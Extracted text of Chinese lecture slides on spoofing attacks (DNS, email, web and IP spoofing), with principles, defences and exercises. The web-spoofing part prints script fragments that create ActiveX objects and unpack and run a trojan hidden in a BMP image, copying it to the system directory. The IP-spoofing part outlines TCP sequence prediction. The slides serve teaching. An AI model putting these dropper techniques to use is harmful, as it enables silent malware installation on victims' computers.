网络安全之欺骗攻.ppt

上传人：牧羊曲112

文档编号：6194404

上传时间：2023-10-04

格式：PPT

页数：24

大小：335.49KB

《网络安全之欺骗攻.ppt》由会员分享，可在线阅读，更多相关《网络安全之欺骗攻.ppt（24页珍藏版）》请在三一办公上搜索。

1、网络安全,第6章程序攻击重点回顾,逻辑炸弹攻击植入后门病毒攻击特洛伊木马攻击其它程序攻击,第7章欺骗攻击,欺骗攻击是网络攻击的一种重要手段。常见的欺骗攻击方式有：DNS欺骗攻击；Email欺骗攻击；Web欺骗攻击和IP欺骗攻击等。本章介绍这些主要欺骗攻击的原理、实现技术。,第7章欺骗攻击,7.1 DNS欺骗攻击 7.2 Email欺骗攻击 7.3 Web欺骗攻击 7.4 IP欺骗攻击,DNS欺骗攻击,DNS原理,第7章第1节,DNS欺骗攻击,DNS欺骗原理假设当提交给某个域名服务器的域名解析请求的数据包被截获，然后按截获者的意图将一个虚假的IP地址作为应答信息返回给请求者，这时，原始

2、请求者就会把这个虚假的IP地址作为它所要请求的域名而进行连接，显然它被欺骗到了别处而根本连接不上自己想要连接的那个域名对那个客户想要连接的域名而言，它就算是被黑掉了，因为客户由于无法得到它的正确的IP地址而无法连接上它,第7章第1节,DNS欺骗攻击,DNS欺骗,第7章第1节,Email欺骗攻击,Email欺骗方法攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序,第7章第2节,Email欺骗攻击,Email欺骗实现步骤SMTP服务器允许匿名登录填写假的名称和发信人地址使用web形式

3、骗取密码，或者使用附件植入木马,第7章第2节,Email欺骗攻击,Email欺骗的防护查看邮件原文，检查真正的发件服务器地址通过邮件链接网页的时候，注意真正的网站地址在不同的应用中，尽可能使用不相同的、无关的密码,第7章第2节,Web欺骗攻击,Web欺骗攻击原理攻击者通过伪造某个WWW站点的影像拷贝，使该Web的入口进入到攻击者的Web影像服务器，并经过攻击者机器的过滤作用，从而达到攻击者监控受攻击者的任何活动以获取有用信息的目的,第7章第3节,Web欺骗攻击,Web欺骗方法改写URLWeb中的脚本,第7章第3节,Web欺骗攻击,改写URL,email with html links

4、seems like Microsoft,html page with links like:,html page with links like:,第7章第3节,Web欺骗攻击,利用Web脚本进行欺骗原理攻击者设计一个网页，并诱使受害者浏览该网页该网页中包含有一个图片和一个脚本当浏览时，该图片被下载到受害者计算机的临时目录中，而脚本被运行脚本的功能是将图片中隐藏的木马提取出来，并设置为自动执行,第7章第3节,Web欺骗攻击,利用Web脚本进行欺骗基本控件,a1=document.applets0;a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A

5、0B);a1.createInstance();reg=a1.GetObject();a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);a1.createInstance();FSO=a1.GetObject();,第7章第3节,7.3 Web欺骗攻击,Web脚本从BMP图片中释放程序,set Lt=FSO.CreateTextFile(path&tmp.in)Lt.WriteLine(rbx)Lt.WriteLine(0)Lt.WriteLine(rcx)Lt.WriteLine(1000)Lt.WriteLine(w136)Lt.Writ

6、eLine(q)Lt.Close,Web欺骗攻击,Web脚本从BMP图片中释放程序,WSH.Run command/c debug&path&tmp.dat&path&tmp.out,false,6 On Error Resume Next FSO.GetFile(path&tmp.dat).Copy(winsys&tmp.exe)FSO.GetFile(path&tmp.dat).Delete FSO.GetFile(path&tmp.in).Delete FSO.GetFile(path&tmp.out).Delete,第7章第3节,Web欺骗攻击,Web欺骗的防护很隐蔽，不容易被发现预

7、防手段禁止浏览器中的JavaScript功能确保浏览器的连接状态是可见的时刻注意所点击的URL链接会在位置状态行中得到正确的显示,第7章第3节,IP欺骗攻击,IP欺骗的基础通过伪造IP地址能够获得更过的收益或者权限伪造的IP地址可以被接受而不被发现,第7章第4节,IP欺骗攻击,IP欺骗的过程,第7章第4节,IP欺骗攻击,IP欺骗的过程首先使被信任主机的网络暂时瘫痪连接到目标机的某个端口来猜测ISN基值和增加规律把源址址伪装成被信任主机，发送带有SYN标志的数据段请求连接等待目标机发送SYN+ACK包给已经瘫痪的主机再次伪装成被信任主机向目标机发送的ACK，此时发送的数据段带有预测的

8、目标机的ISN+1 连接建立，发送命令请求,第7章第4节,IP欺骗攻击,IP欺骗的预防删除/etc/hosts.equiv，$HOME/.rhosts修改/etc/inetd.conf文件，使得RPC机制无法运作设置路由器，过滤来自外部而信源地址却是内部IP的报文修改TCP的ISN变化规律，使得攻击者难以预测,第7章第4节,第7章欺骗攻击,DNS欺骗攻击 Email欺骗攻击 Web欺骗攻击 IP欺骗攻击,第7章小结,第7章欺骗攻击,课后习题请简述DNS的工作原理，并指出在整个DNS解析过程中，可能存在的被欺骗攻击的地方。假如你的主机正在面临DNS欺骗攻击，你打算采取什么解决策略和方案？Web欺骗攻击有哪些具体形式？请简述其原理。假如你负责开发、维护和管理某商业网站，面对潜在的Web欺骗攻击，你将采取哪些手段避免你的网站受到攻击？,第7章习题,